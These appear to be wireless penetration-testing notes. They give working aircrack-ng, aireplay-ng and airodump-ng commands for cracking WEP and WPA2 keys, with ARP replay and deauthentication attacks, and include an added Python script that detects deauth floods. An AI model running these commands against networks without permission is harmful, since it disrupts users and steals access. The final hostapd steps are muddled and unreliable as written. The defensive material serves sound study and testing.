Wireless Attacks

- Below are the setup steps to complete before any wireless pen testing


List interfaces (2 ways):

1- iw dev

2- iwconfig

Monitor mode (2 ways):

1- airmon-ng start wlan0   # usually creates a new monitor interface named wlan0mon

2- ifconfig <interface> down
   iw dev <interface> set type monitor   # 'set type monitor' changes the interface mode; 'set monitor <flags>' only adjusts flags on an interface that is already in monitor mode
   ifconfig <interface> up

Check for and kill processes that interfere with monitor mode (e.g. NetworkManager, wpa_supplicant):

airmon-ng check

airmon-ng check kill

 

WEP Live Cracking

- you need to capture many IV (initialisation vector) packets before the key can be recovered

airodump-ng wlan0   # ensure the interface name has not changed (airmon-ng usually renames it to wlan0mon)

airodump-ng --bssid B8:0D:F7:D5:79:F9 -c 6 wlan0mon   # lock on a specific BSSID and channel; add -w <prefix> to write the capture to file

aireplay-ng -3 -b B8:0D:F7:D5:79:F9 -h 02:00:00:00:09:00 wlan0   # -3 = ARP request replay, -b = BSSID, -h = source MAC

aircrack-ng filename.cap   # run aircrack once enough IVs have been captured


To connect to the network with the found key:

- use wpa_supplicant: first create a .conf file, then connect

- Note: you must start this on a different wireless interface from the one left in monitor mode

network={
    ssid="enter name of network"
    key_mgmt=NONE
    wep_key0="enter password/key"
    wep_tx_keyidx=0
}

wpa_supplicant -B -Dnl80211 -iwlan1 -c <conf file name>   # -B = background, -D = driver (normally nl80211), -i = interface, -c = conf file

To get an IP address on the new interface you started:

dhclient -v wlan1   # you can then scan with nmap


WPA2 Live Cracking

- the goal is to capture the 4-way handshake between a client and the AP

airodump-ng wlan0   # ensure the interface name has not changed

airodump-ng --bssid B8:0D:F7:D5:79:F9 -c 6 wlan0mon -w <outputfilename>   # lock on a specific BSSID and channel; -w writes the capture to file

aireplay-ng -0 <number of deauth packets> -a B8:0D:F7:D5:79:F9 -c 02:00:00:00:09:00 wlan0   # -0 <n> = send n deauth packets, -a = BSSID (or -e followed by the network name), -c = destination (client) MAC

aircrack-ng filename.cap -w <wordlist>   # run aircrack once the handshake has been captured; WPA2 needs a wordlist (dictionary attack), IV counts do not matter here
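As an added, defender-side example that is not part of these notes: the deauthentication burst used above to force a new handshake is easy to spot on the air. The script below runs a per-BSSID sliding-window count over constructed tcpdump-style 802.11 lines (MACs and timestamps are hypothetical lab values) and flags any BSSID that sends five or more deauth/disassociation frames within ten seconds, noting whether any went to the broadcast address.

```python
"""Flag 802.11 deauth/disassoc floods in tcpdump-style 802.11 text output.
Added defender-side example; sample lines are constructed, not real captures."""
import re
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
TS_RE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}\.\d+)")
BSSID_RE = re.compile(r"BSSID:([0-9a-fA-F:]{17})")
DA_RE = re.compile(r"DA:([0-9a-fA-F:]{17})")
KIND_RE = re.compile(r"\b(DeAuthentication|Disassociation)\b")

# Constructed sample (hypothetical lab MACs/timestamps): five deauths from one BSSID inside a
# second (one to broadcast), a beacon, and a lone disassociation from another BSSID an hour later.
SAMPLE_LOG = """\
10:00:00.100000 BSSID:b8:0d:f7:d5:79:f9 DA:ff:ff:ff:ff:ff:ff SA:b8:0d:f7:d5:79:f9 Beacon (lab-net) [1.0 Mbit]
10:00:01.000000 BSSID:b8:0d:f7:d5:79:f9 DA:02:00:00:00:09:00 SA:b8:0d:f7:d5:79:f9 DeAuthentication: Class 3 frame received from nonassociated station
10:00:01.100000 BSSID:b8:0d:f7:d5:79:f9 DA:02:00:00:00:09:00 SA:b8:0d:f7:d5:79:f9 DeAuthentication: Class 3 frame received from nonassociated station
10:00:01.200000 BSSID:b8:0d:f7:d5:79:f9 DA:ff:ff:ff:ff:ff:ff SA:b8:0d:f7:d5:79:f9 DeAuthentication: Class 3 frame received from nonassociated station
10:00:01.300000 BSSID:b8:0d:f7:d5:79:f9 DA:02:00:00:00:09:00 SA:b8:0d:f7:d5:79:f9 DeAuthentication: Class 3 frame received from nonassociated station
10:00:01.400000 BSSID:b8:0d:f7:d5:79:f9 DA:02:00:00:00:09:00 SA:b8:0d:f7:d5:79:f9 DeAuthentication: Class 3 frame received from nonassociated station
11:00:00.000000 BSSID:aa:bb:cc:dd:ee:ff DA:02:00:00:00:09:01 SA:aa:bb:cc:dd:ee:ff Disassociation: Deauthenticated because sending station is leaving
"""

def parse_line(line):
    """Return (seconds, bssid, da) for deauth/disassoc lines, else None."""
    if not KIND_RE.search(line):
        return None
    ts, bssid, da = TS_RE.match(line), BSSID_RE.search(line), DA_RE.search(line)
    if not (ts and bssid and da):
        return None
    h, m, s = ts.groups()
    return int(h) * 3600 + int(m) * 60 + float(s), bssid.group(1).lower(), da.group(1).lower()

def detect_floods(lines, window=10.0, threshold=5):
    """Per-BSSID sliding window. Returns {bssid: (peak_count, saw_broadcast)} for every
    BSSID that reached `threshold` deauth/disassoc frames within `window` seconds."""
    recent, alerts = defaultdict(deque), {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        t, bssid, da = rec
        q = recent[bssid]
        q.append((t, da))
        while t - q[0][0] > window:  # evict frames older than the window
            q.popleft()
        if len(q) >= threshold:
            peak, bcast = alerts.get(bssid, (0, False))
            alerts[bssid] = (max(peak, len(q)), bcast or any(d == BROADCAST for _, d in q))
    return alerts
```

On a real network, enabling 802.11w management frame protection (ieee80211w=2 in hostapd) makes deauth frames unforgeable for clients that support it, which removes the attack rather than just detecting it.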


To connect to the network with the found passphrase:

- use hostapd: first create a .conf file, then connect

- Note: hostapd brings up an access point with these settings rather than joining the existing network as a client; to join as a client, use wpa_supplicant with a WPA-PSK network block instead of the WEP one shown above

- Note: you must start this on a different wireless interface

interface=wlan0
driver=nl80211
ssid=<enter name>
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=<enter passphrase/key>
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1

airmon-ng check kill   # if needed

iwconfig wlan0 mode monitor

ifconfig wlan0 up

hostapd ./hostapd.conf